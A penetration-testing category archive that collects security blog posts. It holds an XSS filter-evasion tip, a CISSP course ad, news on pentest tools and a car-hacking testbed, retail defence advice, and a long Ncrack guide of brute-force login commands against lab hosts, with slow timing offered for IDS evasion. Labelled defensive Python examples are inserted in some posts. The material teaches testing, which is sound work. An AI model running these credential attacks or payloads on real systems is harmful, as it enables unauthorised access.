Category Archives: penetration testing

Professionally Evil Insights: Twelve Days of XSSmas

This series of daily mini-posts, running from December 12, 2018 to December 24, 2018, is intended to provide cross-site scripting (XSS) related tips. This will range from filter-evasion and payload minification tricks, to old (but still good) classic XSS tips, to scripts that make (or contribute to) interesting proof-of-concept payloads.

Day 1

When building payloads to exploit Cross-Site Scripting (XSS), space is often at a premium, or we are trying to bypass controls that attempt to prevent the exact attack we are pulling off. Template literals are a newer addition to JavaScript, but they are not just for string interpolation: those backticks are also useful for filter evasion and payload minification. A simple example:

alert`xss`

This saves two characters and eliminates the need for single or double quotes.

Come back tomorrow for the next tip in the Twelve Days of XSSmas

 


Professionally Evil Insights: Professionally Evil CISSP Certification: Breaking the Bootcamp Model

ISC2 describes the CISSP as a way to prove “you have what it takes to effectively design, implement and manage a best-in-class cybersecurity program”. It is one of the primary certifications used as a stepping stone in a cybersecurity career. Traditionally, students have two options for gaining this certification: self-study or a bootcamp. Both options have pros and cons, but neither is the best.

Bootcamps are a popular way to cram for the certification exam. Students spend five days in total immersion in the topics of the CBK. For many students this is an easy way to pass the exam, because it focuses them on the CISSP study materials for the duration of the bootcamp. But there are a few negatives to this model. The first is the significant cost: the typical prices we see are between $3500 and $5000, with outliers as high as almost $7000. The second is that it takes the student away from their life for a week. Finally, most people finish the bootcamp with the knowledge to pass the exam, but since it was crammed in, they quickly forget most of the information.

Self-study is the other common way to prepare for the CISSP exam. It allows a dedicated student to learn the material at their own pace and on their own timeframe, and to decide how much to spend: from books to online videos and practice exams, the costs vary. The main problem with this method is that students often get distracted by life and work while trying to complete it.

But there is an answer that combines the benefits of both options. Secure Ideas has developed a mentorship program designed to provide the knowledge necessary to pass the certification while working through the common body of knowledge (CBK), all in a manner that encourages retention of that knowledge. And it is #affordabletraining!

The mentorship program is a series of weekly mentor-led discussion and review sessions, together with various student support and communication channels, spanning a total of 9 weeks. These work together to give the student a solid foundation that not only helps in passing the certification but continues to serve as a body of reference information for everyday work. The class covers the 8 domains of the ISC2 CBK:

  • Security and Risk Management
  • Asset Security
  • Security Architecture and Engineering
  • Communication and Network Security
  • Identity and Access Management (IAM)
  • Security Assessment and Testing
  • Security Operations
  • Software Development Security

The Professionally Evil CISSP Mentorship program uses multiple communication and knowledge sharing paths to build a comprehensive learning environment focused on both passing the CISSP certification and gaining a deep understanding of the CBK.

The program consists of the following parts:

  • Official study guide book
  • Weekly live session with instructor(s)
    • Live session will also be recorded
  • Private Slack team for students and instructors to communicate regularly
  • Practice exams
  • While we believe students will pass on their first try, we also include the option for students to take the program as many times as they want, any time we offer it.  🙂

You can sign up for the course over at https://attendee.gototraining.com/r/2538511060126445313 for only $1000.  Our early bird pricing is $800 and is good until January 31.  Just use the Coupon code EARLYBIRD at checkout.  Veterans, active duty military and first responders also get a significant discount.  Email info@secureideas.com for more information.




How can businesses get the most out of pentesting?

More than 4.5 billion data records were compromised in the first half of this year. If you still feel like your enterprise is secure after reading that statistic, you’re one of the few. Hackers utilizing high-profile exploits to victimize organizations is becoming an almost daily occurrence, with 18,000 to 19,000 new vulnerabilities estimated to show up in 2018. Here’s the thing though – we can still address the situation and make the current threat landscape … More

The post How can businesses get the most out of pentesting? appeared first on Help Net Security.

Comprehensive Guide on Ncrack – A Brute Forcing Tool

In this article we will explore network authentication testing with Ncrack. Security professionals depend on Ncrack while auditing their clients. The tool is simple, yet robust in what it offers a penetration tester. It was designed to help companies secure their networks by checking all their hosts and network devices for weak passwords.

Table of Contents

Introduction to Ncrack

  • Exploring Modules

Authentication Phase

  • Basic Attack
  • Dictionary Attack
  • Brute Force Attack
  • Pairwise Attack

Misc Phase

  • Resume the Attack
  • Stop on Success
  • Obtain Result in List Format

Output Format

  • Normal text File
  • All Format At Once
  • Append output
  • Nsock Trace

Timing and Performance

  • Timing Templates
  • Service-Specific Options

Target Specification

  • Input from Nmap’s XML
  • Input from Text file
  • Exclude Host from List 

Introduction to Ncrack

Ncrack is a network authentication cracking tool; it helps pentesters find out how weak the credentials protecting access to a network are. The tool is part of the Kali Linux arsenal and comes preinstalled with the distribution. It also has the unusual ability to attack multiple targets at once, which is not seen very often in such tools.

Ncrack can be started by typing “ncrack” in the terminal. This shows us all the different options the tool provides us.

ncrack

syntax: ncrack [Options] {target:service specification/port number}

Exploring Modules

Ncrack is a very versatile tool: it has modules for most of the popular forms of network authentication. We can see this by listing the modules with the version flag.

ncrack -V

Authentication Phase

Basic Attack

We call this attack basic because at this stage we only know that port 21 is open for the FTP service on the victim’s machine. With the following command we try to find valid FTP login credentials.

ncrack ftp://192.168.0.105

On executing the command above, Ncrack tries to crack the password for the anonymous login account, as shown in the image below.

Dictionary Attack

Suppose you want to obtain valid login credentials for a service such as FTP, SSH or HTTP in one of the following situations:

Situation 1: You know the username but not the password.

Situation 2: You know the password but not the username.

Situation 3: You know neither the username nor the password.

In these situations you should use a wordlist (dictionary) and run the respective ncrack command:

ncrack -user msfadmin -P pass.txt 192.168.0.105:21

ncrack -U user.txt -pass msfadmin 192.168.0.105:21

ncrack -U user.txt -P pass.txt 192.168.0.105:21

Brute Force Attack

Now whenever you consider yourself in following situations:

Situation 1: You have a close guess at a few usernames and passwords for a host:service and do not want to use a dictionary. Then you can run the following command, which reduces the effort of guessing the right credentials.

ncrack -user msfadmin,ignite -pass msfadmin,123 ftp://192.168.0.106

Situation 2: You have a close guess at the usernames and passwords, but there are multiple hosts in the network and guessing a valid login for each destination machine by hand would take a long time.

Again, with the following ncrack command you will be able to find a valid login on any host in the network:

ncrack -user msfadmin,ignite -pass msfadmin,123 192.168.0.1/24:21

Pairwise Attack

Ncrack lets us choose sets of credentials by pairing them by row and column index, meaning the 1st username from user.txt is paired with the 1st password from pass.txt, the 2nd with the 2nd, and so on.

If you do not supply a dictionary, ncrack falls back to its default dictionary for pairing passwords with the anonymous login.

ncrack -v --pairwise 192.168.0.105:21

From the image below you can observe that we made a successful FTP login with the paired password matthew.

Misc Phase

Resume the Attack

This is probably the feature that takes the cake. We all know how frustrating a lost connection or any other technical interruption can be during testing, and this is where Ncrack is a blessing: if your attack gets interrupted, you can pick it up right where you left off.

ncrack --resume /root/.ncrack/restore.2018-12-05_04-36

Stop on Success

As you have seen in the attacks above, Ncrack keeps cracking the service until it has found all possible logins. If you want the attack to stop cracking a service as soon as it finds one valid credential, add the -f option to the ncrack command.

ncrack -v --pairwise 192.168.0.105:21 -f

Obtain Result in List Format

How you maintain your penetration testing report and present the output always matters. Sometimes it is quite hard to arrange the results in a polished form, especially when you have to test multiple host machines. To handle this, ncrack offers the -sL option, which generates the result in a list format.

ncrack ssh://192.168.0.105 ssh://192.168.0.106 -sL

Output Format

Normal text File

If you want to store Ncrack’s output in text or XML format, you can use the -oN option to save the result to a text file with the command below, and later use the cat command to read the information saved in that file.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oN normal.txt

cat normal.txt

Or you can switch to the -oX option to save the output in XML format.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oX save.xml

All Formats At Once

If you want to store Ncrack’s output in both formats (.txt and .xml), choose the -oA option when running the command.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oA output

As you can observe, it has stored the result in two formats, as “output.ncrack” and “output.xml”.

Append output

If the testing is done in iterations, Ncrack gives us the option to append the output to an existing file with ease.

As you can observe, when we crack the FTP service on host 192.168.0.106, it returns ignite:123 as the login credential, which I saved to a text file.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.106:21 -oN normal.txt

But when cracking the SMB service on host 192.168.0.105, it returns msfadmin:msfadmin as the login credential, and here I appended the output to the previous text file.

ncrack -U user.txt -P pass.txt 192.168.0.105:445 -oN normal.txt --append-output

Conclusion: by reading normal.txt we get both results in one place rather than clobbering the specified output file.

Nsock Trace

Ncrack lets us run an nsock trace on the target while attacking it; we can set the trace level anywhere from 0 to 10 depending on our objective. The output from this operation is quite large.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 --nsock-trace 2

We weren’t kidding when we said the output is large!

Timing and Performance

Timing Templates

Timing templates in ncrack are selected with -T<0-5>, with -T0 the slowest and -T5 the fastest. By default all ncrack runs use the -T3 template. Timing templates are used to tune the speed and reliability of a run to get the desired results.

T5: Insane Scan

T4: Aggressive Scan

T3: Normal Scan

T2: Polite Scan

T1: Sneaky Scan

ncrack -U user.txt -P pass.txt 192.168.0.105:21 -T1

As you can observe from the image below, it took 187.57 seconds; this is why T0 and T1 are used to evade firewalls and IDS/IPS.

ncrack -U user.txt -P pass.txt 192.168.0.105:21 -T5

ncrack -U user.txt -P pass.txt 192.168.0.105:21

Executing the commands above, you can compare the completion times in both results: it took 15.01 seconds with T5 and 24.00 seconds with the default (T3).
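The timing comparison above also explains why the slow templates are a detection problem: a single short alerting window counts a T1-style run as one failure per minute and never fires. The following script is an added example, not part of the original article or of Ncrack itself. It runs a per-source sliding-window count over constructed FTP authentication log lines (the line format, the IP addresses and the thresholds are assumptions made for this demo) and shows that a 10-second window catches only the burst, while a 10-minute window also catches the one-attempt-per-minute drip.

```python
"""Sliding-window failed-login detector over constructed auth log lines.

Added example (not from the Hacking Articles post and not Ncrack code): shows why
one short detection window misses a throttled run and why a second, longer window
is needed. Log lines, IPs and thresholds are constructed for the demo.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: burst of 6 failures in 3 s from 10.0.0.5 (fast template),
# drip of 6 failures spaced 60 s apart from 10.0.0.9 (slow template),
# and one normal successful login.
SAMPLE_LOG = """\
2018-12-05T04:36:00 ftp FAIL src=10.0.0.5 user=msfadmin
2018-12-05T04:36:00 ftp FAIL src=10.0.0.5 user=ignite
2018-12-05T04:36:01 ftp FAIL src=10.0.0.5 user=admin
2018-12-05T04:36:01 ftp FAIL src=10.0.0.5 user=root
2018-12-05T04:36:02 ftp FAIL src=10.0.0.5 user=test
2018-12-05T04:36:03 ftp FAIL src=10.0.0.5 user=guest
2018-12-05T04:30:00 ftp FAIL src=10.0.0.9 user=msfadmin
2018-12-05T04:31:00 ftp FAIL src=10.0.0.9 user=ignite
2018-12-05T04:32:00 ftp FAIL src=10.0.0.9 user=admin
2018-12-05T04:33:00 ftp FAIL src=10.0.0.9 user=root
2018-12-05T04:34:00 ftp FAIL src=10.0.0.9 user=test
2018-12-05T04:35:00 ftp FAIL src=10.0.0.9 user=guest
2018-12-05T04:36:10 ftp OK   src=10.0.0.7 user=alice
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (FAIL|OK)\s+src=(\S+) user=(\S+)$")


def parse(log_text):
    """Yield (timestamp, service, outcome, src, user); lines that do not match are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S")
            yield ts, m.group(2), m.group(3), m.group(4), m.group(5)


def detect(log_text, window, threshold):
    """Return the set of source IPs that produced >= threshold failures inside any
    span of length `window`, keeping one deque of recent timestamps per source."""
    recent = defaultdict(deque)
    flagged = set()
    events = sorted(parse(log_text), key=lambda e: e[0])  # collectors deliver out of order
    for ts, _service, outcome, src, _user in events:
        if outcome != "FAIL":
            continue
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:  # expire events that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged.add(src)
    return flagged


def burst_only():
    """Short window: only the fast run crosses the threshold."""
    return detect(SAMPLE_LOG, timedelta(seconds=10), 5)


def burst_and_drip():
    """Long window: the one-per-minute run is caught as well."""
    return detect(SAMPLE_LOG, timedelta(minutes=10), 5)


if __name__ == "__main__":
    print("10 s window:  ", burst_only())       # {'10.0.0.5'}
    print("10 min window:", burst_and_drip())   # {'10.0.0.5', '10.0.0.9'}
```

In practice both windows run side by side, the long window's threshold is set from the service's baseline failure rate, and the alert keys on the source address rather than the account, because a throttled run rotates usernames to stay under per-account lockout limits.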

Service-Specific Options

cl (min connection limit): minimum number of concurrent parallel connections

CL (max connection limit): maximum number of concurrent parallel connections

at (authentication tries): authentication attempts per connection

cd (connection delay): delay <time> between each connection initiation

cr (connection retries): caps number of service connection attempts

to (time-out): maximum cracking <time> for service, regardless of success so far

You can use the options above while testing a whole network for any service.

ncrack ssh://192.168.0.105 -m ftp:cl=10,CL=30,at=5,cd=2ms,cr=10,to=2ms -sL -d

Target Specification

Input from Nmap’s XML

You may be aware of the Nmap tool and its functionality. Suppose that while scanning the network with nmap you stored the results in XML format; you can then use ncrack’s -iX option to crack the running services by reading that XML file.

ncrack -user ignite -pass 123 -iX nmap.xml

As you can observe from the image, ncrack cracked the FTP password by itself, without any service or port being specified on the command line.

Input from Text file

Executing the command again and again for multiple hosts is time consuming, so you can place all the host IPs in a text file and use that file for cracking a particular service.

ncrack -U user.txt -P pass.txt -iL host.txt -p21

Exclude Host from List

Suppose you are using a list that contains multiple IPs or an IP range and you do not want to crack a service on a specific IP. You can use the --exclude option to drop that IP from the list of hosts.

ncrack -U user.txt -P pass.txt -iL host.txt -p21 --exclude 192.168.0.106

As you can observe, this time it did not attack 192.168.0.106 and showed results only for the remaining IPs.

Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Comprehensive Guide on Ncrack – A Brute Forcing Tool appeared first on Hacking Articles.

Toyota presented PASTA (Portable Automotive Security Testbed) Car-Hacking Tool

Takuya Yoshida from Toyota’s InfoTechnology Center and his colleague Tsuyoshi Toyama are members of a Toyota team that developed the new tool, called PASTA (Portable Automotive Security Testbed).

PASTA is an open-source testing platform designed specifically for car hacking; it was developed to help experts test the cyber security features of modern vehicles.

At BLACK HAT EUROPE 2018, held in London, the duo presented the tool and confirmed that Toyota plans to share the specifications on GitHub and will start selling the fully built system in Japan.

The PASTA car hacking tool is contained in an 8 kg portable briefcase. The experts highlighted the automotive industry’s delay in developing cyber security for modern cars.

“The researchers integrated the tool with a driving simulator program, as well as with a model car to demonstrate some ways it can be used. PASTA also can be used for R&D purposes with real vehicles: that would allow a carmaker to test how a third party feature would affect the vehicle and its security, or reprogram firmware, for example.” reported DarkReading.

PASTA

Source: Dark Reading

Taking a close look at the PASTA case, we find four ECUs inside, as well as a console to run tests of the car system’s operation or to carry out attacks, for example injecting CAN messages.

“There was a delay in the development of cybersecurity in the automobile industry; [it’s] late,” explained Toyama.

Now automakers including Toyota are preparing for next-generation attacks, he said, but there remains a lack of security engineers that understand auto technology.

The tool allows researchers to test communications among vehicle components over the CAN protocol, as well as to analyze how the vehicle’s engine control units (ECUs) operate.

Note that PASTA was not designed for hacking scenarios like the one presented by the security duo Charlie Miller and Chris Valasek in 2015, when they remotely hacked a Fiat Chrysler connected car.

PASTA implements a simulation for remote operation of vehicle components and features, including wheels, brakes, windows, and other car functionalities.

“It’s small and portable so users can study, research, and hack with it anywhere.” continues the expert.

PASTA supports connections to OBD-II and RS232C ports, and a port for debugging or binary hacking.

“You can modify the programming of ECUs in C” as well, he said.

Among future improvements for PASTA there is the implementation of other connectivity features, including Ethernet, LIN, and CAN FD, Wi-Fi and of course Bluetooth.

You can download slides and the research paper from the following link:

• Download Presentation Slides
• Download White Paper

Pierluigi Paganini

(Security Affairs – car hacking, PASTA)

The post Toyota presented PASTA (Portable Automotive Security Testbed) Car-Hacking Tool appeared first on Security Affairs.

5 More Retail Cybersecurity Practices to Keep Your Data Safe Beyond the Holidays

This is the second article in a two-part series about retail cybersecurity during the holidays. Read part one for the full list of recommendations.

The holiday shopping season offers myriad opportunities for threat actors to exploit human nature and piggyback on the rush to buy and sell products in massive quantities online. Our previous post covered some network security basics for retailers. Let’s take a closer look at how retailers can properly configure and monitor their networks to help mitigate cyberattacks and provide customers with a safe shopping experience during the holiday season.

1. Take a Baseline Measurement of Your Network Traffic

Baselining is the process of measuring normal amounts of traffic over a period of days or even weeks to discern any suspicious traffic peaks or patterns that could reveal an evolving attack.

Network traffic measurements should be taken during regular business hours as well as after hours to cover the organization’s varying activity phases. As long as the initial baseline is taken during a period when traffic is normal, the data can be considered reliable. An intrusion detection system (IDS) or intrusion prevention system (IPS) can then assist with detecting abnormal traffic volumes — for example, when an intruder is exfiltrating large amounts of data when offices are closed.

Below are some factors to consider when performing a baseline measurement that could be helpful in detecting anomalies:

  • Baseline traffic on a regular basis.
  • Look for atypical traffic during both regular and irregular times (e.g., after hours).
  • Set alarms on an IDS/IPS for high and low thresholds to automate this process. Writing signatures specific to your company’s needs is a key element to an IDS/IPS working effectively and should be carried out by trained security specialists to avoid false alarms.
  • Investigate any discrepancies upon initial discovery and adjust thresholds accordingly.
  • Consider using an endpoint detection and response (EDR) solution to help security teams better identify threats, and to allow operations teams to remediate endpoints quickly and at scale.
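The baselining steps above are easy to state and easy to get wrong in practice: a single global threshold is useless when business-hours traffic is forty times the overnight volume. The script below is an added example, not code from the Security Intelligence article or from any IDS product. It builds a separate baseline (mean and standard deviation of outbound bytes) for each hour of the day from a constructed two-week history, then flags a later sample only when it deviates from its own hour's baseline, so a 900 MB transfer at 02:00 stands out while the same volume at 14:00 would not. The volumes, the 3-sigma limit and the minimum-days rule are assumptions made for the demo.

```python
"""Hour-of-day traffic baseline with z-score anomaly flagging.

Added example (not from the Security Intelligence article): per-hour baseline
from constructed history, then flagging of observations that deviate from the
hour's own mean. All byte counts here are constructed, not measured.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed 14-day history of (day, hour, outbound_bytes): busy business hours,
# quiet after hours, with small day-to-day jitter so each hour's stdev is non-zero.
HISTORY = [
    (day, hour, (800_000_000 if 9 <= hour < 18 else 20_000_000) + (day % 5) * 1_000_000)
    for day in range(14)
    for hour in range(24)
]


def build_baseline(samples, min_days=7):
    """Return {hour: (mean_bytes, stdev_bytes)}.

    An hour with fewer than min_days observations is left out: a threshold
    derived from two or three samples is not a baseline, it is a guess."""
    by_hour = defaultdict(list)
    for _day, hour, nbytes in samples:
        by_hour[hour].append(nbytes)
    return {
        hour: (mean(values), pstdev(values))
        for hour, values in by_hour.items()
        if len(values) >= min_days
    }


def flag_anomalies(baseline, observations, z_limit=3.0, min_stdev=1_000_000):
    """Return [(hour, bytes, z)] for observations more than z_limit standard
    deviations from their hour's baseline.  min_stdev floors sigma so that a
    nearly constant hour cannot turn tiny jitter into an enormous z-score."""
    flagged = []
    for hour, nbytes in observations:
        if hour not in baseline:
            continue  # no reliable baseline for this hour yet
        mu, sigma = baseline[hour]
        z = (nbytes - mu) / max(sigma, min_stdev)
        if abs(z) > z_limit:
            flagged.append((hour, nbytes, round(z, 1)))
    return flagged


# Constructed observations for one new day: ordinary business traffic plus a
# 900 MB transfer at 02:00, the shape an off-hours exfiltration would leave.
TODAY = [(14, 802_000_000), (2, 900_000_000), (10, 799_000_000), (23, 21_000_000)]


def example():
    """Baseline the history and score today's samples; only the 02:00 sample is returned."""
    return flag_anomalies(build_baseline(HISTORY), TODAY)


if __name__ == "__main__":
    for hour, nbytes, z in example():
        print(f"{hour:02d}:00  {nbytes:,} bytes  z={z}")
```

The same structure extends to a weekday/weekend split or to a per-host baseline; what matters is that the comparison group shares the traffic profile of the sample being scored, which is exactly the "regular and irregular times" point in the list above.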


2. Run a Penetration Test Before It’s Too Late

A key preventative measure for retailers with a more mature security posture is running a penetration test. Simply put, the organization’s security team can allow a white hat hacker, or penetration tester, to manually try to compromise assets using the same tactics, techniques and procedures (TTPs) as criminal attackers. This is done to ascertain whether protections applied by the organization are indeed working as planned and to find any unknown vulnerabilities that could enable a criminal to compromise a high-value asset.

Manual testing should be performed in addition to automated scanning. Whereas automated tools can find known vulnerabilities, manual testing finds the unknown vulnerabilities that tools alone cannot find. Manual testing also targets the systems, pieces of information and vulnerabilities most appealing to an attacker, and specifically focuses on attempting to exploit not just technical vulnerabilities within a system, but business logic errors and other functionality that, when used improperly, can grant unintended access and/or expose sensitive data.

The key to a penetration test is to begin by assessing vulnerabilities and addressing as many of them as possible prior to the test. Then, after controls are in place, decide on the type of test to carry out. Will it be a black box test, where the testers receive no information about the target’s code and schematics? Or will it be a white box test, where organizations fully disclose information about the target to give the tester full knowledge of how the system or application is intended to work? Will it be in a very specific scope and only include customer-facing applications?

It can be helpful to scope a penetration test by taking the following three steps prior to launching the testing period:

  1. Establish goals for the testing. Since penetration testing is intended to simulate a real-world attack, consider scenarios that are relevant to your organization. Giving thought to what type of data is at risk or what type of attacker you’re trying to simulate will allow the testers to more closely approximate threats relevant to your organization.
  2. Draft a thorough contract to state the expectations and scope of the project. For example, if there are specific areas a penetration tester should not access based on criticality or sensitivity, such as production servers or credit card data, outline these points in the contract. Also, define whether the penetration testers should attempt to compromise both physical access and remote access to compromise networks, or if just one is preferred. Consider if you wish to have social engineering included within the test as well.
  3. Have the vendor and its employees sign nondisclosure agreements (NDAs) to keep their findings confidential and ensure their exclusive use by the organization.

Penetration testers from reputable companies are thoroughly vetted before being allowed to conduct these tests. The retail industry can benefit from this type of testing because it mimics the actions of a threat actor and can reveal specific weaknesses about an organization. It can even uncover deficiencies in staff training and operational procedures if social engineering is included within the scope of the testing.

3. Check Your Log Files for Anomalies

Log data collected by different systems throughout an organization is critical in investigating and responding to attacks. Bad actors know this and, if they manage to breach an organization and gain elevated privileges, will work to cover up their tracks by tampering with logs.

According to IBM X-Force Incident Response and Intelligence Services (IRIS) research, one of the most common tactics malicious actors employ is post-intrusion log manipulation. In looking to keep their actions concealed, attackers will attempt to manipulate or delete entries, or inject fake entries, from log files. Compromising the integrity of security logs can delay defenders’ efforts to find out about malicious activity. Additional controls and log monitoring can help security teams avoid this situation.

Below are some helpful tips and examples of security logs that must be checked to determine whether anything is out of the ordinary.

  • Are your logs being tampered with? Look for altered timestamps, missing entries, additional or duplicate entries, and anomalous login attempts.
  • Transfer old log files to a restricted zone on your network. This can help preserve the data and create space for logs being generated overnight.
  • Use a security information and event management (SIEM) tool to assist with analyzing logs and identifying anomalies reported by your organization’s security controls.
  • To include as many sources of information as possible, plug in endpoint, server, network, transaction and security logs for analysis by a SIEM system. Look for red flags such as multiple failed logins, denied access to sensitive areas, ping sweeps, etc.
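The first bullet above asks whether the logs themselves have been tampered with. The checks it lists (timestamps, missing, duplicate or inserted entries) can be made mechanical if the collector writes each record with a link to the previous one. The script below is an added example, not code from the Security Intelligence article or from any SIEM. Each record carries the SHA-256 of the record before it, so an edited, deleted or inserted entry breaks the chain at the point of tampering, and the verifier also reports sequence gaps, backwards timestamps and duplicates. The records, the JSON layout and the tampering scenario are constructed for the demo; the chain head would in practice be forwarded to a separate, write-restricted host as each record is written.

```python
"""Tamper checks for a log file: hash chain, sequence, timestamp order, duplicates.

Added example (not from the Security Intelligence article). Records and the
tampering scenario are constructed for the demo.
"""
import hashlib
import json


def chain_hash(prev_hash, entry):
    """SHA-256 over the previous link plus the canonical JSON of this entry."""
    body = json.dumps(entry, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode()).hexdigest()


def write_chained(records, seed="0" * 64):
    """Stamp each record with a sequence number and the previous link.
    Returns (entries, head); the head is what the collector keeps off-box."""
    entries, prev = [], seed
    for i, rec in enumerate(records):
        entry = dict(rec, seq=i, prev=prev)
        prev = chain_hash(prev, entry)
        entries.append(entry)
    return entries, prev


def verify_chain(entries, head, seed="0" * 64):
    """Return a list of findings; an empty list means the log verified clean."""
    findings, prev, last_ts, seen = [], seed, None, set()
    for i, e in enumerate(entries):
        if e.get("seq") != i:
            findings.append(f"entry {i}: sequence gap or reorder (seq={e.get('seq')})")
        if e.get("prev") != prev:
            findings.append(f"entry {i}: chain broken, an earlier entry was edited, removed or inserted")
        if last_ts is not None and e["ts"] < last_ts:
            findings.append(f"entry {i}: timestamp goes backwards")
        if (e["ts"], e["msg"]) in seen:
            findings.append(f"entry {i}: duplicate entry")
        seen.add((e["ts"], e["msg"]))
        last_ts = e["ts"]
        # Resync from the entry's own claimed link so one break is reported once,
        # not echoed by every later entry.
        prev = chain_hash(e.get("prev", prev), e)
    if prev != head:
        findings.append("chain head mismatch: tail truncated or last entry modified")
    return findings


# Constructed records (ISO timestamps sort correctly as strings).
RECORDS = [
    {"ts": "2018-12-05T04:36:00", "msg": "sshd: accepted password for alice from 10.0.0.7"},
    {"ts": "2018-12-05T04:36:05", "msg": "sshd: failed password for root from 10.0.0.9"},
    {"ts": "2018-12-05T04:36:07", "msg": "sshd: accepted password for root from 10.0.0.9"},
    {"ts": "2018-12-05T04:37:00", "msg": "sudo: root ran /bin/rm /var/log/auth.log.1"},
    {"ts": "2018-12-05T04:45:00", "msg": "cron: daily backup finished"},
]


def intact_check():
    """Untouched log: no findings."""
    entries, head = write_chained(RECORDS)
    return verify_chain(entries, head)


def tampered_check():
    """Constructed tampering: the intruder rewrites the successful root login as a
    failure and deletes the sudo line. The verifier reports both at entry 3."""
    entries, head = write_chained(RECORDS)
    entries[2]["msg"] = entries[2]["msg"].replace("accepted", "failed")
    del entries[3]
    return verify_chain(entries, head)


if __name__ == "__main__":
    print("intact:  ", intact_check())     # []
    print("tampered:", tampered_check())   # two findings, both at entry 3
```

The edit to entry 2 is caught one record later, because entry 2's own stored link is still valid; it is entry 3's link that no longer matches. That is the expected behaviour of a backward-pointing chain and is why the head must be stored somewhere the attacker cannot rewrite.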

Knowing which logs to investigate is also critical to successful log analysis. For example, point-of-sale (POS) systems are often installed on Microsoft Windows or Linux systems. It is therefore critical to review operating system logs for these particular endpoints. When it comes to POS networks, where many of the devices are decentralized, daily usage, security and application logs are good places to look for anomalies.

For network security, use logs from network appliances to determine failed or excessive login attempts, increases or decreases in traffic flow, and unauthorized access by users with inadequate privilege levels.

4. Balance Your Network and Website Traffic

According to the National Retail Federation, online sales from November and December 2017 generated more than $138.4 billion, topping 2016 sales by 11.5 percent. This year is likely going to set its own record. With internet traffic volumes expected to be at their highest, online retailers that are unprepared could see the loss of sales and damaged reputation in the aftermath of the holiday season.

But preparing for extra shoppers is the least of retailers’ worries; attackers may take advantage of the festive time of year to extort money by launching distributed denial-of-service (DDoS) attacks against retail websites. These attacks work by flooding a website or network with more traffic than it can handle, causing it to cease accepting requests and stop responding.

To stay ahead of such attacks, online retailers can opt to use designated controls such as load balancers. Load balancers are an integral part of preventing DDoS attacks, which can affect POS systems storewide. With a well-coordinated DDoS attack, a malicious actor could shut down large parts of their target’s networks.

One best practice is to prepare before traffic peaks. Below are some additional tips for a more balanced holiday season.

  • Preventing a DDoS attack can be an imposing undertaking, but with a load balancing device, most of this work can be automated.
  • Load balancers can be either hardware devices or virtual balancers that work to distribute traffic as efficiently as possible and route it to the server or node that can best serve the customer at that given moment. In cases of high traffic, it may take several load balancers to do the work, so evaluate and balance accordingly.
  • Load balancers can be programmed to direct traffic to servers dedicated to customer-facing traffic. Using them can also enable you to move traffic to the proper location instead of inadvertently allowing access to forbidden areas.

Load balancers are typically employed by larger companies with a prominent web footprint. However, smaller companies should still consider employing them because they serve a multitude of purposes. Keeping the load on your servers balanced can help network and website activity run smoothly year-round and prevent DDoS attacks from doing serious damage to your organization’s operations or web presence.

5. Plan and Practice Your Incident Response Strategy

An incident response (IR) plan is essential to identifying and recovering from a security incident. Security incidents should be investigated until they have been classified as true or false positives. The more timely and coordinated an organization’s response is to an incident, the faster it can limit and manage the impact. A solid IR plan can help contain an incident rapidly and result in better protection of customer data, reduction of breach costs and preservation of the organization’s reputation.

If your enterprise does not have an IR plan, now is the time to create one. In the event that your enterprise already has a plan, take the time to get key stakeholders together to review it and ensure it is up-to-date. Most importantly, test and drill the plan and document its effectiveness so you’re prepared for the attack scenarios most relevant to your organization.

When evaluating an IR plan, consider the following tips to help accelerate your organization’s response time:

  • Threat actors who compromise retail cybersecurity will typically turn stolen data around quickly for a profit on the dark web. Use dark web search tools to look for customer data that may have been compromised. Sometimes, data can be identified by the vendor that lost it, leading to the detection of an ongoing attack.
  • Before an attack occurs, establish a dedicated IR team with members from different departments in the organization.
  • Make sure each team member knows his or her precise role in the case of an incident.
  • Keep escalation charts and runbooks readily available to responders, and make sure copies are available offline and duplicated in different physical locations.
  • Test your IR strategy under pressure in an immersive cyberattack simulation to find out where the team is strong and what may still need some fine-tuning.

Make Retail Cybersecurity a Year-Round Priority

Increased vigilance is important for retailers during the holiday season, but these network security basics and practices can, and should, be maintained throughout the year. Remember, attackers don’t just wait until the holiday season to strike. With year-round preparation, security teams can mitigate the majority of threats that come their way.


The post 5 More Retail Cybersecurity Practices to Keep Your Data Safe Beyond the Holidays appeared first on Security Intelligence.

Post-exploitation scanning tool scavenges for useful information

Philip Pieterse, Principal Consultant for Trustwave’s SpiderLabs, has demonstrated at Black Hat Arsenal Europe 2018 a new tool for penetration testers called Scavenger.

About Scavenger

Scavenger is a multi-threaded post-exploitation scanning tool that helps penetration testers pinpoint files and folders that may provide the most “interesting” or useful information. “Scavenger confronts a challenging issue typically faced by penetration testing consultants during internal penetration tests: the issue of having too much access to too many systems … More

The post Post-exploitation scanning tool scavenges for useful information appeared first on Help Net Security.

What Type of Vulnerabilities Does a Penetration Test Look For?

Penetration testing is becoming increasingly popular as organizations are beginning to embrace the need for stronger cybersecurity. But there are still too many businesses that don’t fully understand the benefits of regular security testing. Pen testing is vital for any kind of organization with an IT system or website. A recent survey of penetration testers […]… Read More

The post What Type of Vulnerabilities Does a Penetration Test Look For? appeared first on The State of Security.

Comprehensive Guide on Dymerge

Hello friends! This article is a comprehensive guide to the Dymerge tool. This is a handy little tool that helps you manage all the dictionaries that you’ve created while reading through our blog and using all the amazing tools we’ve written about.

Table of Content

  • What is Dymerge
  • Installing and Launching Dymerge
  • Standard Merge
  • Fast Mode
  • Removing Duplicates
  • Reverse Listing
  • Alphabetic and Numeric Sorting
  • Defining Output
  • Including Characters
  • Compressing Output

Introduction to Dymerge

